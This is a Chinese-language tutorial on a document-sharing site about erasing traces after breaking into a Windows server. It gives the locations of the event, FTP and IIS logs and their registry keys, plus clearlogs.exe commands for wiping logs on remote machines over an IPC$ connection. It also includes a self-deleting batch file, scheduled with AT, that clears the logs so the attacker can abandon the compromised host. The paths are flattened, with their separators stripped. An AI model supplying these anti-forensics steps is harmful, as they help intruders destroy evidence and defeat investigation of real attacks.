- 0
- 0
- 约3.43千字
- 约 4页
- 2026-01-28 发布于中国
- 举报
清理你入侵后的三个重要痕迹
应用程序日志
安全日志
系统日志
DNS日志默认位置:%systemroot%system32config,默认文件大小512KB,管理员都会改变这个默认大小。安全日志文件:%systemroot%system32configSecEvent.EVT
系统日志文件:%systemroot%system32configSysEvent.EVT
应用程序日志文件:%systemroot%system32configAppEvent.EVT
FTP日志默认位置:%systemroot%system32logfilesmsftpsvc1,默认每天一个
WWW日志默认位置:%systemroot%system32logfilesw3svc1,默认每天一个日志
以上日志在注册表里的键:应用程序日志,安全日志,系统日志,DNS服务器日志,
它们这些LOG文件在注册表中的:
HKEY_LOCAL_MACHINEsystemCurrentControlSetServicesEventlog
钥匙(表示成功)和锁(表示当用户在做什么时被系统停止)。接连四个锁图标,表示四次失败审核,事件类型是帐户登录和登录注销失败
怎样删除这些日志:通过上面,得知日志文件通常有某项服务在后台保护,除了系统日志安全日志应用程序日志等等,它们的服务是Windos2000的关键进程,而且与注册表文件在一块,当Windows2000启动后,启动服务来保护这些文件,所以很难删除.
下面就是很难的安全日志和系统日志了,守护这些日志的服务是EventLog,试着停掉它!D:SERVERsystem32LogFilesW3SVC1netstopeventlog这项服务无法接受请求的暂停或停止操作。
怎么清除系统日志.
怎么利用工具清除IIS日志
怎么清除历史和cookie
怎么察看防火墙Blackice的日志
netstat-an表示的什么意思
--------------------------------------------------------------------------------------------------------------
1.系统日志通过手工很难清除.这里我们介绍一个工具clearlog.exe
使用方法:
Usage:clearlogs[\computername]-app/-sec/-sys
-app=应用程序日志
-sec=安全日志
-sys=系统日志
a.可以清除远程计算机的日志
**先用ipc连接上去:netuse\ipipc$密码/user:用户名
**然后开始清除:方法
clearlogs\ip-app这个是清除远程计算机的应用程序日志
clearlogs\ip-sec这个是清除远程计算机的安全日志
clearlogs\ip-sys这个是清除远程计算机的系统日志
b.清除本机日志:如果和远程计算机的不能空连接.那么就需要把这个工具传到远程计算机上面
然后清除.方法:
clearlogs-app这个是清除远程计算机的应用程序日志
clearlogs-sec这个是清除远程计算机的安全日志
clearlogs-sys这个是清除远程计算机的系统日志
安全日志已经被清除.Success:Theloghasbeencleared成功.
为了更安全一点.同样你也可以建立一个批处理文件.让自动清除.做好批处理文件.然后用at命令建立一个计划任务.让自动运行.之后你就可以离开你的肉鸡了.
例如建立一个c.bat
rem==============================开始
@echooff
clearlogs-app
clearlogs-sec
clearlogs-sys
delclearlogs.exe
delc.bat
exit
rem==============================结束
在你的计算机上面测试的时候可以不要@echooff可以显示出来.你可以看到结果
第一行表示:运行时不显示窗口
第二行表示:清除应用程序日志
第三行表示:清除安全日志
第四行表示:清除系统日志
第五行表示:删除clearlogs.exe这个工具
第六行表示:删除c.bat这个批处理文件
第七行表示:退出
用AT命令.建立一个计划任务.这个命令在原来的教程里面和杂志里面都有.你可以去看看详细的使用方法
AT时间c:c.bat
之后你就
您可能关注的文档
最近下载
- 2025-2026学年浙教版八年级上册科学期末复习卷.docx VIP
- 《浙江省建筑安装工程修缮预算定额》2018版项目划分征求意见稿.pdf
- 精品解析:2024年辽宁省大连市中山区中考一模语文试题(原卷版).docx VIP
- 英语新课标1600词汇记背默写本(附答案).doc VIP
- 2025-2026学年浙教版数学八年级上册期末检测卷.docx VIP
- 应急预案编制指导书.pptx
- Ezviz萤石智能门锁DL20S DL30S DL30VS用户手册.pdf
- TCAI 008-2021 可生食鸡蛋规范.docx VIP
- 子宫动脉栓塞术后的护理.pptx VIP
- 建筑工程质量潜在缺陷责任保险条款.pdf VIP
原创力文档

文档评论(0)